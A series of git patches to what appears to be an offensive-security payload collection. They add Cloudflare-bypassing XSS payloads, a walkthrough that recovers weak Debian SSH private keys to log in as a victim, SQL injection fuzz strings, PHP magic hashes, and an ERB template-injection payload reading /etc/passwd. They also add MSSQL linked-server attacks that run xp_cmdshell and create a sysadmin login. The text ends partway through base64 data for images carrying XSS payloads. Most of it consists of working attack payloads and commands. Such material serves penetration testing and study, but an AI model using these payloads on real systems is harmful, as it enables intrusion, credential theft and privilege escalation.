-### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
+### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
+
+#### 21st april 2020
+
+```html
+<svg/OnLoad="`${prompt``}`">
+```
+
+#### 22nd august 2019
+
+```html
+<svg/onload=%26nbsp;alert`bohdan`+
+```
+
+#### 5th jule 2019
+
+```html
+1'"><img/src/onerror=.1|alert``>
+```
+
+#### 3rd june 2019
 
 ```html
 <svg onload=prompt%26%230000000040document.domain)>

From c2b8018617a72e13a3a3c1cb2bfa13d8878d8aa4 Mon Sep 17 00:00:00 2001
From: Heeryong Kang <drakang4@gmail.com>
Date: Wed, 22 Apr 2020 16:09:18 +0900
Subject: [PATCH 35/85] fix typo

---
 CORS Misconfiguration/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index 7d4d715..1bbbc7e 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -131,7 +131,7 @@ https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
 ### Vulnerable Example: Wildcard Origin `*` without Credentials
 
 If the server responds with a wildcard origin `*`, the browser does never send
-the cookies. Howver, if the server does not require authentication, it's still
+the cookies. However, if the server does not require authentication, it's still
 possible to access the data on the server. This can happen on internal servers
 that are not accessible from the Internet. The attacker's website can then
 pivot into the internal network and access the server's data withotu

From 2e507a2b2f82d03151a872c058377efca5d1cebf Mon Sep 17 00:00:00 2001
From: Th1b4ud <th1b4ud@pc-th1b4ud>
Date: Wed, 22 Apr 2020 15:55:10 +0200
Subject: [PATCH 36/85] Linux privesc - SSH Key Predictable PRNG
 (Authorized_Keys) Process

---
 .../Linux - Privilege Escalation.md           | 56 +++++++++++++++++++
 1 file changed, 56 insertions(+)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index 26847cb..d7a9237 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -182,6 +182,61 @@ $ locate password | more
 ...
 ```
 
+## SSH Key
+
+### Sensitive files
+
+```
+find / -name authorized_keys 2> /dev/null
+find / -name id_rsa 2> /dev/null
+...
+```
+
+### SSH Key Predictable PRNG (Authorized_Keys) Process
+
+This module describes how to attempt to use an obtained authorized_keys file on a host system.
+
+Needed : SSH-DSS String from authorized_keys file
+
+**Steps**
+
+1. Get the authorized_keys file. An example of this file would look like so:
+
+```
+ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... 
+```
+
+2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`:
+
+```
+echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config
+echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshs_config
+/etc/init.d/ssh restart
+```
+
+3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys:
+
+```
+git clone https://github.com/g0tmi1k/debian-ssh
+cd debian-ssh
+tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2
+```
+
+4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as:
+
+```
+grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf'
+dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub
+```
+
+5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do:
+
+```
+ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934
+```
+
+And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why.
+
 ## Scheduled tasks
 
 ### Cron jobs
@@ -697,3 +752,4 @@ https://www.exploit-db.com/exploits/18411
 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
 * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
+* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md)

From 14d03b96a1608e5c13592b3850a21dcd858226d6 Mon Sep 17 00:00:00 2001
From: Th1b4ud <th1b4ud@pc-th1b4ud>
Date: Wed, 22 Apr 2020 16:00:31 +0200
Subject: [PATCH 37/85] Linux privesc - SSH Key Predictable PRNG
 (Authorized_Keys) Process - Summary

---
 Methodology and Resources/Linux - Privilege Escalation.md | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index d7a9237..d7a1d78 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -10,6 +10,9 @@
     * [Last edited files](#last-edited-files)
     * [In memory passwords](#in-memory-passwords)
     * [Find sensitive files](#find-sensitive-files)
+* [SSH Key](#ssh-key)
+    * [Sensitive files](##sensitive-files)
+    * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process)
 * [Scheduled tasks](#scheduled-tasks)
     * [Cron jobs](#cron-jobs)
     * [Systemd timers](#systemd-timers)

From 7c8e9ac4ce1d36ff0eec7ce4cd4922e6690632b3 Mon Sep 17 00:00:00 2001
From: Th1b4ud <th1b4ud@pc-th1b4ud>
Date: Wed, 22 Apr 2020 16:01:49 +0200
Subject: [PATCH 38/85] Typo

---
 Methodology and Resources/Linux - Privilege Escalation.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index d7a1d78..ae1705c 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -11,7 +11,7 @@
     * [In memory passwords](#in-memory-passwords)
     * [Find sensitive files](#find-sensitive-files)
 * [SSH Key](#ssh-key)
-    * [Sensitive files](##sensitive-files)
+    * [Sensitive files](#sensitive-files)
     * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process)
 * [Scheduled tasks](#scheduled-tasks)
     * [Cron jobs](#cron-jobs)

From bdf06d4183462045000f39d28e022aa59af52f42 Mon Sep 17 00:00:00 2001
From: Pascal Schulz <clown.charles@liwest.at>
Date: Thu, 23 Apr 2020 13:11:51 +0200
Subject: [PATCH 39/85] added Hacksplained's YT channel

---
 YOUTUBE.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/YOUTUBE.md b/YOUTUBE.md
index ba90f41..c1ed1b9 100644
--- a/YOUTUBE.md
+++ b/YOUTUBE.md
@@ -9,6 +9,7 @@
 - [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A)
 - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)
 - [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg)
+- [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained)
 
 ## Conferences
 

From 04899355adfd17bbdf468d1e8c863ebb3b2e6161 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 26 Apr 2020 21:43:42 +0200
Subject: [PATCH 40/85] Magic Hashes + SQL fuzz

---
 .../Cloud - Azure Pentest.md                      | 15 ++++++++++++++-
 .../Network Pivoting Techniques.md                |  3 +++
 SQL Injection/Intruder/Generic_Fuzz.txt           | 12 ++++++++++++
 Type Juggling/README.md                           |  6 +++++-
 4 files changed, 34 insertions(+), 2 deletions(-)
 create mode 100644 SQL Injection/Intruder/Generic_Fuzz.txt

diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md
index 9c4d692..7a3c720 100644
--- a/Methodology and Resources/Cloud - Azure Pentest.md	
+++ b/Methodology and Resources/Cloud - Azure Pentest.md	
@@ -7,6 +7,7 @@
 * [Azure Storage Account - Access](#azure-storage-account----access)
 * [Azure AD vs Active Directory](#azure-ad-vs-active-directory)
 * [Azure AD - Enumeration](#azure-ad---enumeration)
+* [Azure AD - Convert GUID to SID](#azure-ad---convert-guid-to-sid)
 * [Azure AD - Sign in with a service principal](#azure-ad---sign-in-with-a-service-principal)
 * [Azure AD Connect - Password extraction](#azure-ad-connect---password-extraction)
 * [Azure AD Connect - MSOL Account's password and DCSync](#azure-ad-connect---msol-accounts-password-and-dcsync)
@@ -285,6 +286,17 @@ With Microsoft, if you are using any cloud services (Office 365, Exchange Online
 3. Pick the account from the active sessions
 4. Select Azure Active Directory and enjoy!
 
+## Azure AD - Convert GUID to SID
+
+The user's AAD id is translated to SID by concatenating `"S-1–12–1-"` to the decimal representation of each section of the AAD Id.
+
+```powershell
+GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
+SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
+```
+
+For example, the representation of `6aa89ecb-1f8f-4d92–810d-b0dce30b6c82` is `S-1–12–1–1789435595–1301421967–3702525313–2188119011`
+
 ## Azure AD - Sign in with a service principal
 
 https://docs.microsoft.com/en-us/powershell/azure/authenticate-azureps?view=azps-3.3.0&viewFallbackFrom=azurermps-6.5.0#sign-in-with-a-service-principal
@@ -443,4 +455,5 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an
 * [Azure AD connect for RedTeam - @xpnsec](https://blog.xpnsec.com/azuread-connect-for-redteam/)
 * [Azure Privilege Escalation Using Managed Identities - Karl Fosaaen - February 20th, 2020](https://blog.netspi.com/azure-privilege-escalation-using-managed-identities/)
 * [Hunting Azure Admins for Vertical Escalation - LEE KAGAN - MARCH 13, 2020](https://www.lares.com/hunting-azure-admins-for-vertical-escalation/)
-* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
\ No newline at end of file
+* [Introducing ROADtools - The Azure AD exploration framework - Dirk-jan Mollema](https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/)
+* [Moving laterally between Azure AD joined machines - Tal Maor - Mar 17, 2020](https://medium.com/@talthemaor/moving-laterally-between-azure-ad-joined-machines-ed1f8871da56)
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 2fa5a50..f2fbcd6 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -151,6 +151,9 @@ pacman -Sy sshuttle
 apt-get install sshuttle
 sshuttle -vvr user@10.10.10.10 10.1.1.0/24
 sshuttle -vvr username@pivot_host 10.2.2.0/24 
+
+# using a private key
+$ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" 
 ```
 
 ## chisel
diff --git a/SQL Injection/Intruder/Generic_Fuzz.txt b/SQL Injection/Intruder/Generic_Fuzz.txt
new file mode 100644
index 0000000..624fb4d
--- /dev/null
+++ b/SQL Injection/Intruder/Generic_Fuzz.txt	
@@ -0,0 +1,12 @@
+1
+1'
+1"
+[1]
+1`
+1\
+1/*'*/
+1/*!1111'*/
+1'||'asd'||'
+1' or '1'='1
+1 or 1=1
+'or''='
\ No newline at end of file
diff --git a/Type Juggling/README.md b/Type Juggling/README.md
index c51c805..7e97f99 100644
--- a/Type Juggling/README.md	
+++ b/Type Juggling/README.md	
@@ -42,9 +42,13 @@ var_dump(md5([]));  # NULL
 
 If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.
 
-| Hash | “Magic” Number / String    | Magic Hash                                    | Found By      |
+| Hash | “Magic” Number / String    | Magic Hash                                    | Found By / Description      |
 | ---- | -------------------------- |:---------------------------------------------:| -------------:|
 | MD5  | 240610708                  | 0e462097431906509019562988736854              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
+| MD5  | QNKCDZO                    | 0e830400451993494058024219903391              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
+| MD5  | 0e1137126905               | 0e291659922323405260514745084877              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
+| MD5  | 0e215962017                | 0e291242476940776845150308577824              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
+| MD5  | 129581926211651571912466741651878684928                | 06da5430449f8f6f23dfc1276f722738              | Raw: ?T0D??o#??'or'8.N=? |
 | SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
 | SHA-224 | 10885164793773          | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
 | SHA-256 | 34250003024812          | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |

From 7f1fb329806d038c52ec7457ba077faa23eff3c3 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Thu, 30 Apr 2020 17:13:58 +0700
Subject: [PATCH 41/85] Adding Execute code using SSTI for ERB engine.

---
 Server Side Template Injection/README.md | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 5998047..29ede3d 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -97,6 +97,12 @@ Execute code using SSTI for Slim engine.
 #{ %x|env| }
 ```
 
+Execute code using SSTI for ERB engine.
+
+```ruby
+<%= system('cat /etc/passwd') %>
+```
+
 ## Java
 
 ### Basic injection
@@ -452,4 +458,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
 * [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
 * [Server Side Template Injection – on the example of Pebble - MICHAŁ BENTKOWSKI | September 17, 2019](https://research.securitum.com/server-side-template-injection-on-the-example-of-pebble/)
-* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)
\ No newline at end of file
+* [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - 15 APR 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)

From 712e3b93f6b39d70a302034caebf1503da307bc4 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Thu, 30 Apr 2020 17:15:31 +0700
Subject: [PATCH 42/85] Sorting like basic injection part

---
 Server Side Template Injection/README.md | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 29ede3d..687a319 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -91,17 +91,16 @@ Slim:
 
 ### Code execution
 
-Execute code using SSTI for Slim engine.
-
-```powershell
-#{ %x|env| }
-```
-
 Execute code using SSTI for ERB engine.
 
 ```ruby
 <%= system('cat /etc/passwd') %>
 ```
+Execute code using SSTI for Slim engine.
+
+```powershell
+#{ %x|env| }
+```
 
 ## Java
 

From da5dc1299e2f174e49b0cbdfcea32ed4f22c555c Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 1 May 2020 12:06:18 +0200
Subject: [PATCH 43/85] MSSQL Trusted Link

---
 SQL Injection/MSSQL Injection.md | 59 ++++++++++++++++++++++++++++++++
 1 file changed, 59 insertions(+)

diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 0e79365..2be3918 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -17,6 +17,7 @@
 * [MSSQL Command execution](#mssql-command-execution)
 * [MSSQL UNC path](#mssql-unc-path)
 * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
+* [MSSQL Trusted Links](#mssql-trusted-links)
 
 ## MSSQL comments
 
@@ -25,6 +26,12 @@
 /* comment goes here */
 ```
 
+## MSSQL User
+
+```sql
+SELECT CURRENT_USER
+```
+
 ## MSSQL version
 
 ```sql
@@ -162,6 +169,25 @@ sqsh -S 192.168.1.X -U sa -P superPassword
 python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
 ```
 
+Execute Python script 
+
+> Executed by a different user than the one using xp_cmdshell to execute commands
+
+```powershell
+#Print the user being used (and execute commands)
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
+#Open and read a file
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
+#Multiline
+EXECUTE sp_execute_external_script @language = N'Python', @script = N'
+import sys
+print(sys.version)
+'
+GO
+```
+
+
 ## MSSQL UNC Path
 
 MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
@@ -176,8 +202,41 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad
 EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
 ```
 
+## MSSQL Trusted Links
+
+> The links between databases work even across forest trusts.
+
+```powershell
+msf> use exploit/windows/mssql/mssql_linkcrawler
+[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio
+```
+
+Manual exploitation
+
+```sql
+-- find link
+select * from master..sysservers
+
+-- execute query through the link
+select * from openquery("dcorp-sql1", 'select * from master..sysservers')
+select version from openquery("linkedserver", 'select @@version as version');
+
+-- chain multiple openquery
+select version from openquery("link1",'select version from openquery("link2","select @@version as version")')
+
+-- execute shell commands
+EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer
+select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
+
+-- create user and give admin privileges
+EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
+```
+
 ## References
 
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
 * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
 * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
+* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
+* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
\ No newline at end of file

From e9b296adb3aca9bcaf3f80b6d56d78c67e8158e3 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 2 May 2020 14:31:33 +0200
Subject: [PATCH 44/85] DoyenSec Payloads XSS Google Scholar

---
 .../payload_in_all_known_exif_corrupted.jpg     | Bin 0 -> 32464 bytes
 .../payload_in_all_known_exif_corrupted.png     | Bin 0 -> 45572 bytes
 .../Files/payload_in_all_known_metadata.jpg     | Bin 0 -> 28581 bytes
 .../Files/payload_in_all_known_metadata.png     | Bin 0 -> 39710 bytes
 XSS Injection/Files/payload_text_xss.png        | Bin 0 -> 28082 bytes
 5 files changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg
 create mode 100644 XSS Injection/Files/payload_in_all_known_exif_corrupted.png
 create mode 100644 XSS Injection/Files/payload_in_all_known_metadata.jpg
 create mode 100644 XSS Injection/Files/payload_in_all_known_metadata.png
 create mode 100644 XSS Injection/Files/payload_text_xss.png

diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg b/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg
new file mode 100644
index 0000000000000000000000000000000000000000..ad73a45632f657592b89b84c07769822e619ec94
GIT binary patch
literal 32464
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
